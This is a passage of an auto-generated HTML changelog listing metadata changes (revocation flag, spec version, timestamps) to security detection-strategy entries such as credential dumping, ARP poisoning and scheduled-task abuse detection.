1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0234] Credential Dumping via Sensitive Memory and Registry Access Correlation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0460] Credential Stuffing Detection via Reused Breached Credentials Across Services</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0591] Cross-Platform Behavioral Detection of File Timestomping via Metadata Tampering</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0063] Cross-Platform Behavioral Detection of Python Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0094] Cross-Platform Behavioral Detection of Scheduled Task/Job Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0290] Cross-Platform Detection of Cron Job Abuse for Persistence and Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0573] Cross-Platform Detection of Data Transfer to Cloud Account</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0264] Cross-Platform Detection of JavaScript Execution Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0333] Cross-Platform Detection of Scheduled Task/Job Abuse via `at` Utility</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0090] Cross-host C2 via Removable Media Relay</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0238] Defacement via File and Web Content Modification Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0387] Detect ARP Cache Poisoning Across Linux, Windows, and macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0113] Detect AS-REP Roasting Attempts (T1558.004)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0224] Detect Abuse of Component Object Model (T1559.001)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0198] Detect Abuse of Container APIs for Credential Access</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0504] Detect Abuse of Dynamic Data Exchange (T1559.002)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old 